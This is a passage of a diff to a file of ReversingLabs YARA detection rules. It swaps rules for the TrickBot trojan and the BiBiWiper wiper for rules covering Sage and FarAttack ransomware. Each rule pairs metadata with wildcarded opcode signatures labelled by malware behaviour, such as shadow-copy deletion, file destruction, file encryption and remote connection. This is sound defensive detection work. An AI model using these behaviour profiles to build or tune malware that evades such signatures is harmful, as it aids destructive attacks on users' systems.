+            8B 44 24 ?? 8B 4C 24 ?? 8B 1C 88 53 55 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 57 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8B E8 E8 ?? ?? ?? ?? 6A ?? 56 89 44 24 ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 53 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            56 E8 ?? ?? ?? ?? 33 C0 8D 54 24 ?? 55 52 C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 84
+            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84
+            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 44 24 ?? 50 56
+            E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ??
+            ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 8B D3 52 E8 ?? ??
+            ?? ?? 8B 4C 24 ?? 8B 44 24 ?? 8B 6C 24 ?? 41 83 C4 ?? 89 4C 24 ?? 3B C8 0F 82 ?? ??
+            ?? ?? 33 DB 33 F6 3B C3 76 ?? 8B 44 24 ?? 8B 0C B0 51 E8 ?? ?? ?? ?? 46 83 C4 ?? 3B
+            74 24 ?? 72 ?? 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ??
+            3B C3 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 5F 5E 5D 3B C3 5B 74 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 83 C4 ?? C3
+      }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $get_disk_information_p* ) ) and ( all of ( $get_os_information_p* ) ) and ( all of ( $take_screenshot_p* ) )
+		uint16( 0 ) == 0x5A4D and $scan_for_services and $find_files and $encrypt_files and $remote_connection
 }
-rule REVERSINGLABS_Win32_Trojan_Trickbot : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Sage : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects TrickBot trojan."
+		description = "Yara rule that detects Sage ransomware."
 		author = "ReversingLabs"
-		id = "4ed253cc-0398-542b-a2b7-c42a0b9431fb"
+		id = "81f4c666-93f9-51bb-8dda-431ef7a81b74"
 		date = "2020-06-26"
 		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Win32.Trojan.TrickBot.yara#L1-L46"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Sage.yara#L1-L77"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e10f16c70f1ff7cf11d3e25f06e4c5d9e20c51688582d2b51322f768a8e06d7e"
+		logic_hash = "69079b7176050096cdbaaaff30dd0359366b3a6a74e8bc17db348794388f71ba"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Trojan"
-		tc_detection_name = "TrickBot"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Sage"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$entry_setup = {
-            58 (68 | 8B) [6-8] 59 [1-3] E2 ?? 57 8B (C7 | EC) 8B (C7 | EC) 05 ?? ?? ?? ?? 68 [4-5]
-            89 45 [1-2] 8B D7 [3-4] 8B C1 66 AD 85 C0 74 ?? 3B (C1 | C8) (72 | 77) ?? 2B C1 (C1 | D1)
-            [2-4] 8B CF 03 C8 81 C1 ?? ?? ?? ?? 8B 01 59 03 D0 52 EB ?? 89 45 ?? 8B C5 B9 ?? ??
-            ?? ?? C1 E1 ?? 2B C1 8B 00 89 45 ?? 6A ?? 8B D0 59 FF D2 89 68 ?? 6A ?? 8B D0 FF D2
+		$remote_connection = {
+            83 EC ?? 8B 44 24 ?? 53 55 56 57 8B 7C 24 ?? 8B 77 ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ??
+            8B D8 51 89 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 89 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 89 77 ?? FF 15 ?? ?? ?? ?? 8B E8 89 6C 24 ?? 85 ED 0F 84
+            ?? ?? ?? ?? 8B 74 24 ?? 6A ?? 56 53 55 FF 15 ?? ?? ?? ?? 8B D8 89 5C 24 ?? 85 DB 0F
+            84 ?? ?? ?? ?? 8B 4C 24 ?? 33 C0 BA ?? ?? ?? ?? 66 3B F2 0F 95 C0 48 25 ?? ?? ?? ??
+            50 6A ?? 6A ?? 6A ?? 51 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 8B FF
+            8D 54 24 ?? 52 56 FF D3 8D 44 24 ?? 50 8B 44 24 ?? 50 50 57 E8 ?? ?? ?? ?? 83 C4 ??
+            50 56 FF D5 85 C0 0F 84 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 6A ?? 8D 4C 24 ?? 51 8D 54
+            24 ?? 52 6A ?? 68 ?? ?? ?? ?? 56 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 56 FF 15 ?? ?? ?? ??
+            53 FF 15 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ??
+            83 C4 ?? 8B 44 24 ?? 5F 5E 5D 5B 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 04 24 83
+            C4 ?? C3 57 E8 ?? ?? ?? ?? 83 C4
         }
-		$decrypt_function_snippet = {
-            58 8B C8 75 ?? 58 2B F0 50 8B D8 49 75 ?? 59 58 59 5E 5F 5B C3
+		$encrypt_files = {
+            83 EC ?? 53 8B 1D ?? ?? ?? ?? 55 8B 6C 24 ?? 56 57 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68
+            ?? ?? ?? ?? 8D 7D ?? 57 FF D3 8B F0 83 FE ?? 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ??
+            ?? 89 44 24 ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B
+            4C 24 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 51 FF D3 8B D8 83 FB ?? 75 ??
+            56 FF 15 ?? ?? ?? ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 83 C4 ?? C3 8B 54 24 ?? 6A ?? 52 57
+            56 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 8B 35 ?? ?? ?? ?? 8B E8 FF D6 53 FF D6 85 ED 79 ??
+            8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 8B C5 5D 5B 83 C4 ?? C3 57 E8 ?? ?? ?? ?? 8B
+            F0 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 8B D8 FF 15 ?? ?? ?? ?? 8B 4C 24 ??
+            6A ?? 53 51 EB ?? 8B 4C 24 ?? BA ?? ?? ?? ?? 3B 55 ?? 1B C0 83 C0 ?? 50 51 57 56 56
+            E8 ?? ?? ?? ?? 83 C4 ?? 56 8B D8 FF 15 ?? ?? ?? ?? 85 DB 79 ?? 5F 5E 5D 8B C3 5B 83
+            C4 ?? C3 57 E8 ?? ?? ?? ?? 8B F0 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B
+            D8 53 57 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5D 33
+            C0 5B 83 C4 ?? C3
         }
-		$decrypt_function_snippet_wrapper = {
-            55 BD ?? ?? ?? ?? 50 51 52 6A ?? FF 45 ?? 8B 45 ?? 59 F7 E1 8D 8D ?? ?? ?? ?? 03 C8
-            89 4D ?? 8F 41 ?? 8F 41 ?? 8F 41 ?? 8F 41 ?? 8F 01 89 79 ?? 89 71 ?? 8B D1 59 89 4A
-            ?? 55 2B C0 8B C8 8B 02 8B F8 58 41 41 41 41 50 2B C1 8B 00 3B C7 72 ?? 58 C1 E9 ??
-            49 89 4A ?? E3 ?? FF 55 ?? 8B 55 ?? 8B 4A ?? FF 55 ?? 50 51 50 6A ?? 59 FF 55 ?? FF
-            D0
+		$find_files = {
+            53 55 8B 2D ?? ?? ?? ?? 56 57 33 FF 57 57 FF D5 8B F0 85 F6 74 ?? 85 FF 74 ?? 57 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 44 36 ?? 50 6A ?? 8B DE E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 57 56
+            FF D5 8B F0 3B DE 72 ?? 66 83 3F ?? 8B DF 0F 84 ?? ?? ?? ?? 8B 6C 24 ?? 53 8B FB FF
+            15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8D 5C 43 ?? FF D6 85 C0 74 ?? 68
+            ?? ?? ?? ?? 57 FF D6 85 C0 74 ?? 57 FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 D3 E2 F6
+            C2 ?? 74 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 57 8B F0 E8 ?? ?? ?? ?? 6A ?? 89 06 8D 46 ??
+            6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4E ?? 51 C7 46 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            8D 56 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 55 89 46 ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 66 83 3B ?? 0F 85 ?? ?? ?? ?? 5F 5E 5D 5B C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $entry_setup and ( $decrypt_function_snippet or $decrypt_function_snippet_wrapper )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $remote_connection )
 }
-rule REVERSINGLABS_Win32_Trojan_Bibiwiper : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Farattack : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects BiBiWiper trojan."
+		description = "Yara rule that detects FarAttack ransomware."
 		author = "ReversingLabs"
-		id = "8462ceb8-ec54-5f92-a3e7-c96e52647ca7"
-		date = "2023-11-28"
-		modified = "2023-11-28"
+		id = "7ee7121a-4ca2-513c-96dc-53b5c48d719f"
+		date = "2022-06-21"
+		modified = "2022-06-21"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Win32.Trojan.BiBiWiper.yara#L1-L102"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.FarAttack.yara#L1-L93"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d75954c05a8f82ad90a4adf6a2a3748928488ddebe40d8f8a790bfcde0b02a11"
+		logic_hash = "af22b8110c2b545f083b443c7a1fa7e7639324e9188eefadfe1fe70ebb1bb7fb"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Trojan"
-		tc_detection_name = "BiBiWiper"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "FarAttack"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$delete_shadow_copies_p1 = {
-            48 89 5C 24 ?? 55 48 8D 6C 24 ?? 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4
-            48 89 45 ?? 33 DB 48 C7 44 24 ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 5C 24 ?? 48
-            8D 4C 24 ?? 48 89 5C 24 ?? 44 8D 43 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24
-            ?? 48 8B 54 24 ?? 48 0F 43 4C 24 ?? 48 03 D1 48 8D 4C 24 ?? 48 83 7C 24 ?? ?? 48 0F
-            43 4C 24 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 8D 55 ?? 48 0F 43 4C
-            24 ?? 48 2B D1 0F B6 01 88 04 0A 48 8D 49 ?? 84 C0 75 ?? 0F 57 C0 C7 44 24 ?? ?? ??
-            ?? ?? 48 8D 45 ?? 45 33 C9 48 89 44 24 ?? 48 8D 55 ?? 48 8D 44 24 ?? 45 33 C0 48 89
-            44 24 ?? 33 C9 48 89 5C 24 ?? 48 89 5C 24 ?? 0F 11 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89
-            5C 24 ?? 0F 11 44 24 ?? 66 89 5D ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ??
-            FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8B 4C 24 ?? 48 FF C2 48 8B C1
-            48 81 FA ?? ?? ?? ?? 72 ?? 48 8B 49 ?? 48 83 C2 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ??
-            0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ??
-            ?? 48 89 5C 24 ?? 48 8D 4C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 7C
-            24 ?? ?? 48 8D 4C 24 ?? 48 8B 54 24 ?? 48 0F 43 4C 24 ?? 48 03 D1 48 8D 4C 24 ?? 48
-            83 7C 24 ?? ?? 48 0F 43 4C 24 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48
-            8D 55 ?? 48 0F 43 4C 24 ?? 48 2B D1 0F B6 01 88 04 0A 48 8D 49 ?? 84 C0 75 ?? 0F 57
-            C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 45 ?? 45 33 C9 48 89 44 24 ?? 48 8D 55 ?? 48 8D 44
-            24 ?? 45 33 C0 48 89 44 24 ?? 33 C9 48 89 5C 24 ?? 48 89 5C 24 ?? 0F 11 45 ?? C7 44
-            24 ?? ?? ?? ?? ?? 89 5C 24 ?? 0F 11 44 24 ?? 66 89 5D ?? 0F 11 45 ?? 0F 11 45 ?? 0F
+		$find_files = {
+            56 FF 73 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 50 FF 15 ?? ?? ?? ?? 56 E8 ??
+            ?? ?? ?? 59 6A ?? 58 E9 ?? ?? ?? ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 03 C7 89
+            45 ?? 3D ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? F7 06 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 4E ??
+            51 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? F6 06 ?? 74 ?? 8B 45 ?? 8D 04 45 ?? ?? ?? ?? 50 8D 46 ??
+            50 8B 43 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 8B 53 ??
+            8B 75 ?? 8B 01 53 89 44 72 ?? 66 8B 41 ?? 8B CE 66 89 44 4A ?? FF 43 ?? 83 63 ?? ??
+            E8 ?? ?? ?? ?? FF 4B ?? 83 63 ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 83 7B ?? ?? 75 ?? FF 73
+            ?? FF 73 ?? FF 73 ?? FF 73 ?? 57 FF 73 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? C7 43
+            ?? ?? ?? ?? ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ??
+            ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8D
+            04 45 ?? ?? ?? ?? 50 8D 46 ?? 50 8B 43 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 83 7E ?? ?? 75 ?? 83 7E ?? ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 8B F8 8B 45 ?? 8D 34 00
+            8D 4E ?? 51 E8 ?? ?? ?? ?? 56 89 07 FF 73 ?? 50 E8 ?? ?? ?? ?? 8B 07 33 C9 83 C4 ??
+            66 89 0C 06 8B 75 ?? 51 57 51 8B 46 ?? 89 47 ?? 8B 46 ?? 89 47 ?? 8B 45 ?? 89 47 ??
+            FF 73 ?? FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 4B ?? A1 ?? ?? ?? ?? 89 44 79 ?? 66 A1 ?? ??
+            ?? ?? 66 89 44 79 ?? 56 FF 75 ?? FF 15
         }
-		$delete_shadow_copies_p2 = {
-            11 45 ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8B 4C 24
-            ?? 48 FF C2 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 8B 49 ?? 48 83 C2 ?? 48 2B C1 48
-            83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 5C 24
-            ?? 48 8D 15 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 4C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 8B 54 24 ?? 48 0F 43 4C 24 ?? 48 03
-            D1 48 8D 4C 24 ?? 48 83 7C 24 ?? ?? 48 0F 43 4C 24 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ??
-            ?? 48 8D 4C 24 ?? 48 8D 55 ?? 48 0F 43 4C 24 ?? 48 2B D1 90 0F B6 01 88 04 0A 48 8D
-            49 ?? 84 C0 75 ?? 0F 57 C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 45 ?? 45 33 C9 48 89 44 24
-            ?? 48 8D 55 ?? 48 8D 44 24 ?? 45 33 C0 48 89 44 24 ?? 33 C9 48 89 5C 24 ?? 48 89 5C
-            24 ?? 0F 11 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? 0F 11 44 24 ?? 66 89 5D ?? 0F
-            11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 83
-            FA ?? 72 ?? 48 8B 4C 24 ?? 48 FF C2 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 8B 49 ??
-            48 83 C2 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8
-            ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 4C 24 ?? 48 C7
-            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 8B 54 24 ??
-            48 0F 43 4C 24 ?? 48 03 D1 48 8D 4C 24 ?? 48 83 7C 24 ?? ?? 48 0F 43 4C 24 ?? E8 ??
-            ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 8D 55 ?? 48 0F 43 4C 24 ?? 48 2B D1 90
-            0F B6 01 88 04 0A 48 8D 49 ?? 84 C0 75 ?? 0F 57 C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 45
-            ?? 45 33 C9 48 89 44 24 ?? 48 8D 55 ?? 48 8D 44 24 ?? 45 33 C0 48 89 44 24 ?? 33 C9
-            48 89 5C 24 ?? 48 89 5C 24 ?? 0F 11 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24
+		$create_key = {
+            55 8B EC 56 6A ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 75 ?? 32 C0 EB ?? A1 ?? ?? ?? ?? 53
+            33 DB 85 C0 74 ?? 53 6A ?? 53 53 56 FF D0 EB ?? 8A C3 84 C0 75 ?? FF 15 ?? ?? ?? ??
+            3D ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 53 53 56 FF D0 8A D8 84
+            DB 75 ?? 56 E8 ?? ?? ?? ?? 59 32 C0 EB ?? 8B 4D ?? B0 ?? 89 71 ?? 5B 5E 5D C3
         }
-		$destroy_files_p1 = {
-            48 89 5C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48
-            33 C4 48 89 44 24 ?? 4D 8B E9 4D 8B E0 4C 8B F9 48 63 BC 24 ?? ?? ?? ?? 33 F6 89 74
-            24 ?? 48 8B 05 ?? ?? ?? ?? 48 FF C0 48 89 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 B8
-            ?? ?? ?? ?? ?? ?? ?? ?? 48 F7 E9 48 C1 FA ?? 48 8B C2 48 C1 E8 ?? 48 03 D0 48 69 C2
-            ?? ?? ?? ?? 48 3B C8 75 ?? 4C 8B 05 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8D 0D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 C1 E3 ?? 33 D2 49 8B C4 49 F7 F5 48
-            8B E8 48 2B EB 83 FF ?? 7E ?? 48 8D 47 ?? 48 0F AF C3 33 D2 49 F7 F4 EB ?? 48 8B D6
-            45 33 C0 49 8B CF E8 ?? ?? ?? ?? 49 8B CF E8 ?? ?? ?? ?? 48 63 C8 49 3B CC 0F 87 ??
-            ?? ?? ?? 49 8B C4 48 2B C1 49 8B FC 48 2B F9 48 3B D8 48 0F 42 FB 48 8B CF E8 ?? ??
-            ?? ?? 48 89 44 24 ?? 0F 57 C0 4C 63 F7 F3 0F 7F 44 24 ?? 48 89 74 24 ?? 85 FF 74 ??
-            48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 4C 3B F0 0F 87 ?? ?? ?? ?? 49 81 FE ?? ?? ?? ?? 72
+		$encrypt_files_p1 = {
+            50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 83
+            FF ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 0B 45 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 48 ?? 8B 40
+            ?? 83 C1 ?? 03 C1 8B 5D ?? 89 5D ?? 8B 4D ?? 89 4D ?? 99 03 D8 89 5D ?? 13 CA 89 4D
+            ?? 8B 55 ?? 8B 45 ?? 85 D2 7C ?? 7F ?? 3D ?? ?? ?? ?? 76 ?? 89 75 ?? EB ?? 83 65 ??
+            ?? 85 D2 7C ?? 7F ?? 3D ?? ?? ?? ?? 76 ?? 89 75 ?? EB ?? 83 65 ?? ?? C7 45 ?? ?? ??
+            ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 59 89 4D ?? 51
+            52 50 E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 8B 4D ?? 6A ?? 53 51 6A ?? 6A ?? 57 FF 15 ??
+            ?? ?? ?? 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? B8 ?? ??
+            ?? ?? 89 45 ?? 89 45 ?? 33 C9 8B C1 89 45 ?? 89 45 ?? 89 4D ?? 89 4D ?? 89 45 ?? 89
+            45 ?? 89 4D ?? 8B 4D ?? FF 71 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? FF 71 ?? FF 71 ?? 8D 41 ?? 50
+            FF 71 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B 55 ?? 85 C0
         }
-		$destroy_files_p2 = {
-            49 8D 4E ?? 49 3B CE 0F 86 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 48 85 C0 0F 84 ?? ??
-            ?? ?? 48 83 C0 ?? 48 83 E0 ?? 48 89 48 ?? EB ?? 49 8B CE E8 ?? ?? ?? ?? 48 89 44 24
-            ?? 4A 8D 1C 30 48 89 5C 24 ?? 4D 8B C6 33 D2 48 8B C8 E8 ?? ?? ?? ?? 48 89 5C 24 ??
-            C7 44 24 ?? ?? ?? ?? ?? 85 FF 7E ?? 48 8B DE 44 8B F7 66 0F 1F 44 00 ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 88 04 0B 48 8D 5B ?? 49 83 EE ?? 75 ?? 4D 85 ED 7E
-            ?? 4D 8B CF 41 B8 ?? ?? ?? ?? 48 8B D7 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 49 8B CF E8 ??
-            ?? ?? ?? 48 63 C8 48 8D 04 29 48 03 C7 49 3B C4 76 ?? 49 8B FC 48 2B F9 48 2B FD 48
-            85 FF 7E ?? 41 B8 ?? ?? ?? ?? 48 8B D5 49 8B CF E8 ?? ?? ?? ?? FF C6 48 63 C6 49 3B
-            C5 7C ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8B 4C 24 ?? 48 85 C9 74 ?? 48 8B 54 24
-            ?? 48 2B D1 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48
-            83 C0 ?? 48 83 F8 ?? 77 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? ?? 48
-            8B 9C 24 ?? ?? ?? ?? 48 83 C4 ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3
+		$encrypt_files_p2 = {
+            75 ?? 89 55 ?? 21 45 ?? 8B CE 89 4D ?? 89 4D ?? EB ?? 8B 4D ?? 3B 4D ?? 0F 8D ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 85 C9 74 ?? 83 7D ?? ?? 74 ?? 8D 41 ?? 3B 45 ?? 74 ??
+            8B C1 99 FF 75 ?? FF 75 ?? 52 50 E8 ?? ?? ?? ?? 8B C8 89 45 ?? C7 45 ?? ?? ?? ?? ??
+            EB ?? 8B CA 81 E9 ?? ?? ?? ?? 89 4D ?? 8B 55 ?? 83 DA ?? 83 65 ?? ?? 89 55 ?? 6A ??
+            8B 45 ?? FF 70 ?? 52 51 E8 ?? ?? ?? ?? 6A ?? 8B 4D ?? FF 71 ?? 52 50 E8 ?? ?? ?? ??
+            8B C8 89 4D ?? 89 55 ?? 8B 45 ?? 2B C1 89 45 ?? 8B 4D ?? 1B CA 89 45 ?? 89 4D ?? EB
+            ?? 8B 55 ?? 8B C2 C1 F8 ?? FF 75 ?? FF 75 ?? 52 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ??
+            89 45 ?? 85 C0 75 ?? 50 FF 75 ?? FF 75 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ??
